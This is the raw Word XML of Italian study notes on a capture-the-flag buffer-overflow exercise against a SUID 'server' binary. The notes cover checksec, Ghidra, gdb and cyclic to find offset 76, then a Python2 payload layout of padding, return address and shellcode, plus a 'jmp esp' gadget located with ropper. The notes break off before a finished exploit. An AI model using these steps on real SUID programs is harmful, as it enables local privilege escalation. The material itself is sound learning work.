      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> 4655 server --&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>Il numero 4655 rappresenta i permessi in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA70371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formato ottale. Il 4 iniziale indica il bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C1204" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SUID (Set User ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8C08FC" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">655: 110 | 101 | 101 --&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-r-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134163BF" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"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rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:t>U (proprietario) legge e scrive ma non esegue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9C52B4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G (gruppo) legge ed esegue ma non scrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1DA5B2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  <w:t>O (altri) legge ed esegue ma non scrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A837E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B434CD8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>L'impostazione del bit SUID su un eseguibile fa sì che, quando eseguito, il programma venga eseguito con i permessi del proprietario del file (in questo caso, root), piuttosto che con i permessi dell'utente che lo ha eseguito. Questo è un meccanismo che può essere sfruttato per un'escalation dei privilegi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE7CCAB" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="0C7B610F" w14:textId="6C911010" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>Con queste impostazioni non dovremmo riuscire a leggere il contenuto di flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74472475" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ file server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E9C8E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>checksec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1389FB28" w14:textId="77777777" w:rsidR="008B240B" w:rsidRDefault="008B240B" w:rsidP="0070510D"/>
    <w:p w14:paraId="3427C189" w14:textId="77777777" w:rsidR="008B240B" w:rsidRDefault="008B240B" w:rsidP="0070510D"/>
    <w:p w14:paraId="64301121" w14:textId="77777777" w:rsidR="008B240B" w:rsidRDefault="008B240B" w:rsidP="008B240B">
      <w:r>
        <w:t>Visto che servono i permessi per tutto faremo questo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230E0125" w14:textId="77777777" w:rsidR="008B240B" w:rsidRPr="008B240B" w:rsidRDefault="008B240B" w:rsidP="008B240B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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sudo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chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>my_user</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>my_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4EC054" w14:textId="77777777" w:rsidR="008B240B" w:rsidRPr="008B240B" w:rsidRDefault="008B240B" w:rsidP="008B240B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 600 flag.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47355931" w14:textId="77777777" w:rsidR="008B240B" w:rsidRPr="008B240B" w:rsidRDefault="008B240B" w:rsidP="008B240B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>my_user</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>my_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB7E3F" w14:textId="77777777" w:rsidR="008B240B" w:rsidRPr="008B240B" w:rsidRDefault="008B240B" w:rsidP="008B240B">
      <w:r w:rsidRPr="008B240B">
        <w:t xml:space="preserve">$ sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B240B">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B240B">
        <w:t xml:space="preserve"> 4755 server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3383D932" w14:textId="6C7603E2" w:rsidR="008B240B" w:rsidRPr="0070510D" w:rsidRDefault="008B240B" w:rsidP="0070510D">
      <w:r w:rsidRPr="008B240B">
        <w:t>Essenzialmente dopo essermi impostato proprietario di tutti I fi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">le mi do tutti i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>permesi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sul server per non avere problemi durante l’esecuzione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD8DDC3" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> --&gt; per poter aprire "server" su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> ho dovuto eseguire:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643C2982" w14:textId="14221FEA" w:rsidR="005D4A9F" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo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chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>my_user:my_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3469E445" w14:textId="1C637196" w:rsidR="0070510D" w:rsidRPr="00AF5671" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="00AF5671">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF5671">
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF5671">
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E84E15" w14:textId="69A047C3" w:rsidR="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>cyclic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> 100 --&gt; come faccio ad essere s</w:t>
      </w:r>
      <w:r>
        <w:t>icuro che bastano 100??</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B0C4E6" w14:textId="77777777" w:rsidR="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22954873" wp14:editId="21DD146F">
            <wp:extent cx="6120130" cy="2813685"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1358347328" name="Immagine 1" descr="Immagine che contiene testo, software, numero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7328" name="Immagine 1" descr="Immagine che contiene testo, software, numero, Icona del computer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156" w14:textId="0135F93F" w:rsidR="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BD3AE2">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Estratto dalla comparazione con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C9A556D" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="5DC62586" w14:textId="244289E0" w:rsidR="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r>
        <w:t xml:space="preserve">Essendo un totale di 76 100 bastano </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eccomme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C338C" w14:textId="02F5F71A" w:rsidR="001849B8" w:rsidRPr="001849B8" w:rsidRDefault="001849B8" w:rsidP="001849B8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 w:rsidRPr="001849B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cyclic -l</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001849B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001849B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>taaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77E1338E" w14:textId="3E67B426" w:rsidR="008B240B" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001849B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding cyclic pattern of 4 bytes: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001849B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b'taaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001849B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' (hex: 0x74616161)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001849B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Found at offset 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="008B240B" w:rsidRPr="001849B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5150DCB4" w14:textId="2F67158C" w:rsidR="001849B8" w:rsidRPr="00AF5671" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF5671">
        <w:t>----&gt; SHELL 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3D3B7B" w14:textId="010E76D2" w:rsidR="001849B8" w:rsidRPr="00AF5671" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF5671">
        <w:t>Come sarà fatto l’offset??</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48183256" w14:textId="6D87FE0F" w:rsidR="001849B8" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pyhton2 -c ‘print “A” * 76 + “B” * 4 + “C” * 100‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>A -&gt; padding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>B -&gt; address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>C -&gt; shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBDA4C3" w14:textId="4C9030D1" w:rsidR="001849B8" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001849B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2DF207" wp14:editId="40908B7B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-629285</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>281940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7158990" cy="944880"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="187774360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3606" name="Immagine 1" descr="Immagine che contiene schermata,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EFF69" w14:textId="2B5660A9" w:rsidR="001849B8" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:r w:rsidRPr="001849B8">
        <w:t>Come si nota dall’immagine il g</w:t>
      </w:r>
      <w:r>
        <w:t>adget che vogliamo usare è quel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFA97FE" w14:textId="7167D915" w:rsidR="001849B8" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:r>
        <w:t>0804919</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>f  ff</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  e4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>JMP</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FEBDD2" w14:textId="74860BF7" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="001849B8">
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5586052E" wp14:editId="174B4921">
            <wp:extent cx="6120130" cy="1812290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111731441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14414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DF97" w14:textId="2564609B" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="001849B8">
      <w:r>
        <w:t xml:space="preserve">Eseguendo il gadget faremo una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> verso </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">… quindi li andrà messo l’indirizzo allo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6711DBC7" w14:textId="36503019" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="001849B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --file server --search “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0224DC" w14:textId="00A630B6" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="122F0532" wp14:editId="6CF01580">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-720090</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>415925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7559675" cy="2324100"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="167622321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3211" name="Immagine 1" descr="Immagine che contiene testo, schermat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CE9">
        <w:t xml:space="preserve">&gt;&gt; 0x0804919f: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D6CE9">
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D6CE9">
        <w:t xml:space="preserve"> esp; --&gt; ma se i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nvece di farlo manualmente vogliamo usare una libreria che contiene già vari </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> utilizzabili possiamo usare “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE23694" w14:textId="396F5F42" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AEAE0FA" w14:textId="056940D3" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Quello che ci interessa è -l.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FB64FF" w14:textId="77777777" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0DDBD4" w14:textId="0B7459C1" w:rsidR="009D6CE9" w:rsidRPr="00AF5671" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
